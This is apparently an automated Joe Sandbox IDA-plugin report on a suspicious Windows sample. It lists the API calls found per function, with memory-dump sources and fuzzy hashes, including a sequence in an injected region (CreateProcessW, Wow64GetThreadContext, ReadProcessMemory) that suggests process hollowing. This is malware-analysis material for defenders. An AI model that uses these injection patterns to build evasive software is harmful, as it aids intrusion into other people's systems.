                                                                                  • Instruction Fuzzy Hash: B062F830A14618DBEB24CFA4C840BDEB776FF58300F1095A9D20DEB294E7769E85CB59
                                                                                  APIs
                                                                                    • Part of subcall function 004F4517: _fseek.LIBCMT ref: 004F452F
                                                                                    • Part of subcall function 0053C56D: _wcscmp.LIBCMT ref: 0053C65D
                                                                                    • Part of subcall function 0053C56D: _wcscmp.LIBCMT ref: 0053C670
                                                                                  • _free.LIBCMT ref: 0053C4DD
                                                                                  • _free.LIBCMT ref: 0053C4E4
                                                                                  • _free.LIBCMT ref: 0053C54F
                                                                                    • Part of subcall function 00511C9D: RtlFreeHeap.NTDLL(00000000,00000000,?,00517A85), ref: 00511CB1
                                                                                    • Part of subcall function 00511C9D: GetLastError.KERNEL32(00000000,?,00517A85), ref: 00511CC3
                                                                                  • _free.LIBCMT ref: 0053C557
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                                                                  • String ID:
                                                                                  • API String ID: 1552873950-0
                                                                                  • Opcode ID: 0c4af10440446b1fe8382cae8d32a76f34f7d3e1743b3aef6b58de3d60be7303
                                                                                  • Instruction ID: 02c3d7b09f09943845715867045da5477f79c909ff353281c3d8f2ae12427902
                                                                                  • Opcode Fuzzy Hash: 0c4af10440446b1fe8382cae8d32a76f34f7d3e1743b3aef6b58de3d60be7303
                                                                                  • Instruction Fuzzy Hash: 5E514BB1904219AFDF149F64DC85BAEBBB9FF88304F1004AEB219B3241DB715A808F58
                                                                                  APIs
                                                                                  • _memset.LIBCMT ref: 0050EBB2
                                                                                    • Part of subcall function 004F51AF: _memset.LIBCMT ref: 004F522F
                                                                                    • Part of subcall function 004F51AF: _wcscpy.LIBCMT ref: 004F5283
                                                                                    • Part of subcall function 004F51AF: Shell_NotifyIconW.SHELL32(00000001,?), ref: 004F5293
                                                                                  • KillTimer.USER32(?,00000001,?,?), ref: 0050EC07
                                                                                  • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 0050EC16
                                                                                  • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00563C88
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                                                                  • String ID:
                                                                                  • API String ID: 1378193009-0
                                                                                  • Opcode ID: b60083142ffcedd4f4ce96da40b8791299eb25bb7b16517bbc04da07c1d3dd80
                                                                                  • Instruction ID: d3e60ca063e5a458ac413ca265156f6fce883c2f355b647748b592ec19171967
                                                                                  • Opcode Fuzzy Hash: b60083142ffcedd4f4ce96da40b8791299eb25bb7b16517bbc04da07c1d3dd80
                                                                                  • Instruction Fuzzy Hash: 0421C5709047849FF7329B289859BEABFFCBF51308F14088DE68E67181C3752E849B51
                                                                                  APIs
                                                                                  • GetTempPathW.KERNEL32(00000104,?), ref: 0053C72F
                                                                                  • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 0053C746
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: Temp$FileNamePath
                                                                                  • String ID: aut
                                                                                  • API String ID: 3285503233-3010740371
                                                                                  • Opcode ID: 5ea023560861e9d5126cb87c30d2163627e56fa7c9038d52a3d79c9b2afa8a32
                                                                                  • Instruction ID: 86355ff58075fa486a94872ad385c7fc33e8fd074a4bd176071bba9eb605892d
                                                                                  • Opcode Fuzzy Hash: 5ea023560861e9d5126cb87c30d2163627e56fa7c9038d52a3d79c9b2afa8a32
                                                                                  • Instruction Fuzzy Hash: 98D05B7554030D6BDB509B50EC0DF8A777C5B10704F0001507654950B2DAB0D6DA9B64
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 63e99bcec6e42624ff4decb7285efd5d28c643b29b8c5622525581679075697e
                                                                                  • Instruction ID: ed939f733476f083c51a476b410d0bff965975a086b6d95855e048fc9723be17
                                                                                  • Opcode Fuzzy Hash: 63e99bcec6e42624ff4decb7285efd5d28c643b29b8c5622525581679075697e
                                                                                  • Instruction Fuzzy Hash: C9F15A716083059FC710DF28C495B6EBBE5FF89318F14892EF9959B291D730E905CB82
                                                                                  APIs
                                                                                  • _memset.LIBCMT ref: 004F5022
                                                                                  • Shell_NotifyIconW.SHELL32(00000000,?), ref: 004F50CB
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: IconNotifyShell__memset
                                                                                  • String ID:
                                                                                  • API String ID: 928536360-0
                                                                                  • Opcode ID: c595e127da1108235dca068772499defe11557c3a35d548335b5d8e2e0878958
                                                                                  • Instruction ID: 1508614187ea5baa92fe21b5870209bb74800fa3aec425f364180ecbc1307e12
                                                                                  • Opcode Fuzzy Hash: c595e127da1108235dca068772499defe11557c3a35d548335b5d8e2e0878958
                                                                                  • Instruction Fuzzy Hash: E431AEB0504B05DFD760EF24D8446ABBBF4FF58308F00092EF69A83240EB756948CB9A
                                                                                  APIs
                                                                                  • __FF_MSGBANNER.LIBCMT ref: 00513973
                                                                                    • Part of subcall function 005181C2: __NMSG_WRITE.LIBCMT ref: 005181E9
                                                                                    • Part of subcall function 005181C2: __NMSG_WRITE.LIBCMT ref: 005181F3
                                                                                  • __NMSG_WRITE.LIBCMT ref: 0051397A
                                                                                    • Part of subcall function 0051821F: GetModuleFileNameW.KERNEL32(00000000,005B0312,00000104,00000000,00000001,00000000), ref: 005182B1
                                                                                    • Part of subcall function 0051821F: ___crtMessageBoxW.LIBCMT ref: 0051835F
                                                                                    • Part of subcall function 00511145: ___crtCorExitProcess.LIBCMT ref: 0051114B
                                                                                    • Part of subcall function 00511145: ExitProcess.KERNEL32 ref: 00511154
                                                                                    • Part of subcall function 00517C0E: __getptd_noexit.LIBCMT ref: 00517C0E
                                                                                  • RtlAllocateHeap.NTDLL(015B0000,00000000,00000001,00000001,00000000,?,?,0050F507,?,0000000E), ref: 0051399F
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                                                                  • String ID:
                                                                                  • API String ID: 1372826849-0
                                                                                  • Opcode ID: 414e57cc067c26b9071c7f7ae9ee6f1431fef477486057e0cf9db68f5bde661d
                                                                                  • Instruction ID: 931b5dd08acaf98d847efaad22ff720677fae6b6fd9cbd5ec5dd8d869d693074
                                                                                  • Opcode Fuzzy Hash: 414e57cc067c26b9071c7f7ae9ee6f1431fef477486057e0cf9db68f5bde661d
                                                                                  • Instruction Fuzzy Hash: 7401D6352456129AF7213F28DC6AAFE3F58BBC1B24B200525F5059B191DFB09DC08AA0
                                                                                  APIs
                                                                                  • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,0053C385,?,?,?,?,?,00000004), ref: 0053C6F2
                                                                                  • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,0053C385,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 0053C708
                                                                                  • CloseHandle.KERNEL32(00000000,?,0053C385,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 0053C70F
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: File$CloseCreateHandleTime
                                                                                  • String ID:
                                                                                  • API String ID: 3397143404-0
                                                                                  • Opcode ID: cf92a650a387800c08a790c89b5b7196472194871bfbbcbf8e39834f356b7f83
                                                                                  • Instruction ID: 9ce1889a6a0da892c213a24b17b71727f1fd56d7f414de84fa4ba319518cdb48
                                                                                  • Opcode Fuzzy Hash: cf92a650a387800c08a790c89b5b7196472194871bfbbcbf8e39834f356b7f83
                                                                                  • Instruction Fuzzy Hash: 33E08632140214B7DB212B54BC09FCA7F39EF15761F104110FB19790E097B12555A7A8
                                                                                  APIs
                                                                                  • _free.LIBCMT ref: 0053BB72
                                                                                    • Part of subcall function 00511C9D: RtlFreeHeap.NTDLL(00000000,00000000,?,00517A85), ref: 00511CB1
                                                                                    • Part of subcall function 00511C9D: GetLastError.KERNEL32(00000000,?,00517A85), ref: 00511CC3
                                                                                  • _free.LIBCMT ref: 0053BB83
                                                                                  • _free.LIBCMT ref: 0053BB95
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                  • String ID:
                                                                                  • API String ID: 776569668-0
APIs
  • Part of subcall function 004F22A4: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,004F24F1), ref: 004F2303
• GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 004F25A1
• CoInitialize.OLE32(00000000), ref: 004F2618
• CloseHandle.KERNEL32(00000000), ref: 0056503A
Memory Dump Source
• Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
Similarity
• API ID: Handle$CloseInitializeMessageRegisterWindow
• String ID:
• API String ID: 3815369404-0
APIs
• IsThemeActive.UXTHEME ref: 004F3A73
  • Part of subcall function 00511405: __lock.LIBCMT ref: 0051140B
  • Part of subcall function 004F3ADB: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 004F3AF3
  • Part of subcall function 004F3ADB: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 004F3B08
  • Part of subcall function 004F3D19: GetCurrentDirectoryW.KERNEL32(00007FFF,?,00000000,00000001,?,?,004F3AA3,?), ref: 004F3D45
  • Part of subcall function 004F3D19: IsDebuggerPresent.KERNEL32(?,?,?,?,004F3AA3,?), ref: 004F3D57
  • Part of subcall function 004F3D19: GetFullPathNameW.KERNEL32(00007FFF,?,?,005B1148,005B1130,?,?,?,?,004F3AA3,?), ref: 004F3DC8
  • Part of subcall function 004F3D19: SetCurrentDirectoryW.KERNEL32(?,?,?,004F3AA3,?), ref: 004F3E48
• SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 004F3AB3
Memory Dump Source
• Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
Similarity
• API ID: InfoParametersSystem$CurrentDirectory$ActiveDebuggerFullNamePathPresentTheme__lock
• String ID:
• API String ID: 924797094-0
APIs
• ___lock_fhandle.LIBCMT ref: 0051EA29
• __close_nolock.LIBCMT ref: 0051EA42
  • Part of subcall function 00517BDA: __getptd_noexit.LIBCMT ref: 00517BDA
  • Part of subcall function 00517C0E: __getptd_noexit.LIBCMT ref: 00517C0E
Memory Dump Source
• Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
Similarity
• API ID: __getptd_noexit$___lock_fhandle__close_nolock
• String ID:
• API String ID: 1046115767-0
APIs
  • Part of subcall function 0051395C: __FF_MSGBANNER.LIBCMT ref: 00513973
  • Part of subcall function 0051395C: __NMSG_WRITE.LIBCMT ref: 0051397A
  • Part of subcall function 0051395C: RtlAllocateHeap.NTDLL(015B0000,00000000,00000001,00000001,00000000,?,?,0050F507,?,0000000E), ref: 0051399F
• std::exception::exception.LIBCMT ref: 0050F51E
• __CxxThrowException@8.LIBCMT ref: 0050F533
  • Part of subcall function 00516805: RaiseException.KERNEL32(?,?,0000000E,005A6A30,?,?,?,0050F538,0000000E,005A6A30,?,00000001), ref: 00516856
Memory Dump Source
• Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
Similarity
• API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
• String ID:
• API String ID: 3902256705-0
APIs
  • Part of subcall function 00517C0E: __getptd_noexit.LIBCMT ref: 00517C0E
• __lock_file.LIBCMT ref: 00513629
  • Part of subcall function 00514E1C: __lock.LIBCMT ref: 00514E3F
• __fclose_nolock.LIBCMT ref: 00513634
Memory Dump Source
• Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
Similarity
• API ID: __fclose_nolock__getptd_noexit__lock__lock_file
• String ID:
• API String ID: 2800547568-0
APIs
• CreateProcessW.KERNELBASE(?,00000000), ref: 015F6DA3
• Wow64GetThreadContext.KERNEL32(?,00010007), ref: 015F6E39
• ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 015F6E5B
Memory Dump Source
• Source File: 00000000.00000002.1318668522.00000000015F5000.00000040.00000020.00020000.00000000.sdmp, Offset: 015F5000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_15f5000_ek8LkB2Cgo.jbxd
Similarity
• API ID: Process$ContextCreateMemoryReadThreadWow64
• String ID:
• API String ID: 2438371351-0
APIs
• __flush.LIBCMT ref: 00512A0B
  • Part of subcall function 00517C0E: __getptd_noexit.LIBCMT ref: 00517C0E
Memory Dump Source
• Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
Similarity
• API ID: __flush__getptd_noexit
• String ID:
• API String ID: 4101623367-0
APIs
Memory Dump Source
• Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
Similarity
• API ID: ProtectVirtual
• String ID:
• API String ID: 544645111-0
APIs
Memory Dump Source
• Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
Similarity
• API ID: ClearVariant
• String ID:
• API String ID: 1473721057-0
APIs
  • Part of subcall function 004F4214: FreeLibrary.KERNEL32(00000000,?), ref: 004F4247
• LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,004F39FE,?,00000001), ref: 004F41DB
  • Part of subcall function 004F4291: FreeLibrary.KERNEL32(00000000), ref: 004F42C4
Memory Dump Source
• Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
Similarity
• API ID: Library$Free$Load
• String ID:
• API String ID: 2391024519-0
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: ClearVariant
                                                                                  • String ID:
                                                                                  • API String ID: 1473721057-0
                                                                                  • Opcode ID: 80c76484d076cf40e66842ae9e723e2b6ed62cc70989f59808de0c5dcca49972
                                                                                  • Instruction ID: 32c51b84a196eae1d9f79e3cdc8aada38a5abfc35e5d22d5d8eaf0afa1328984
                                                                                  • Opcode Fuzzy Hash: 80c76484d076cf40e66842ae9e723e2b6ed62cc70989f59808de0c5dcca49972
                                                                                  • Instruction Fuzzy Hash: D721F4705086018FDB24DF68C448B2EBFF1BF84344F154968EA9A5B6A2D732E845DF62
                                                                                  APIs
                                                                                  • ___lock_fhandle.LIBCMT ref: 0051AFC0
                                                                                    • Part of subcall function 00517BDA: __getptd_noexit.LIBCMT ref: 00517BDA
                                                                                    • Part of subcall function 00517C0E: __getptd_noexit.LIBCMT ref: 00517C0E
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: __getptd_noexit$___lock_fhandle
                                                                                  • String ID:
                                                                                  • API String ID: 1144279405-0
                                                                                  • Opcode ID: 2d1c626a21f116b176b5986c5eec1a0cb7aa9e05ca0be0c4f64e92c3a7940ddf
                                                                                  • Instruction ID: 0b6490ff041dd28aad51b832d121beac6c1d479015571efb4f10c1c24a19b7e4
                                                                                  • Opcode Fuzzy Hash: 2d1c626a21f116b176b5986c5eec1a0cb7aa9e05ca0be0c4f64e92c3a7940ddf
                                                                                  • Instruction Fuzzy Hash: AC1190728096059FF7126FA8C8497DE3E60BF89335F194740E4300B1E2D7B49DC49BA1
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: LibraryLoad
                                                                                  • String ID:
                                                                                  • API String ID: 1029625771-0
                                                                                  • Opcode ID: 279f5f87aea4605f70f2d64a128fa314d82d263771f3b219d5efef33e318cff7
                                                                                  • Instruction ID: b719697a787a50b3e44d40733306c681529280a08a7a651ee39f7fb55a5bd112
                                                                                  • Opcode Fuzzy Hash: 279f5f87aea4605f70f2d64a128fa314d82d263771f3b219d5efef33e318cff7
                                                                                  • Instruction Fuzzy Hash: 8001867150010EAFCF04EF65C8828FFBF74AF50344F00806AB61697195EA349A49CB64
                                                                                  APIs
                                                                                  • __lock_file.LIBCMT ref: 00512AED
                                                                                    • Part of subcall function 00517C0E: __getptd_noexit.LIBCMT ref: 00517C0E
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: __getptd_noexit__lock_file
                                                                                  • String ID:
                                                                                  • API String ID: 2597487223-0
                                                                                  • Opcode ID: ba8106758aa7c41f934fb5f0957cd3bf48a9155a6bd0d6a4deac1b8ffeb6780e
                                                                                  • Instruction ID: 5ef7a1b1885e949692882f60d0822ce5c39ec12a286d10155ddc98b8559637d8
                                                                                  • Opcode Fuzzy Hash: ba8106758aa7c41f934fb5f0957cd3bf48a9155a6bd0d6a4deac1b8ffeb6780e
                                                                                  • Instruction Fuzzy Hash: B7F0623150020AAAFF21AF788C0A7DF3EA5BF80310F154515B4149A191D7B88AE2DB51
                                                                                  APIs
                                                                                  • FreeLibrary.KERNEL32(?,?,?,?,?,004F39FE,?,00000001), ref: 004F4286
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: FreeLibrary
                                                                                  • String ID:
                                                                                  • API String ID: 3664257935-0
                                                                                  • Opcode ID: d38e912582733548f43dee21cca9de0a4c6691c75fed00dd6e0c79767f0a4a71
                                                                                  • Instruction ID: 8b87bd062d96786f1f42a173b6290677bf4b6b33b374bc4f3826d73a0945d457
                                                                                  • Opcode Fuzzy Hash: d38e912582733548f43dee21cca9de0a4c6691c75fed00dd6e0c79767f0a4a71
                                                                                  • Instruction Fuzzy Hash: F0F05870404306CFCB348F609490823BBE0BE803653268ABFE28682610CB359884DB54
                                                                                  APIs
                                                                                  • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 004F40C6
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: LongNamePath
                                                                                  • String ID:
                                                                                  • API String ID: 82841172-0
                                                                                  • Opcode ID: a088ef47b3156bed397eb87662201790543fcb15686a44f3697071c046c83950
                                                                                  • Instruction ID: 2fdd0ce4905607a764244043bb3e305d3a4129ac9c987f84e9e9444a359487fe
                                                                                  • Opcode Fuzzy Hash: a088ef47b3156bed397eb87662201790543fcb15686a44f3697071c046c83950
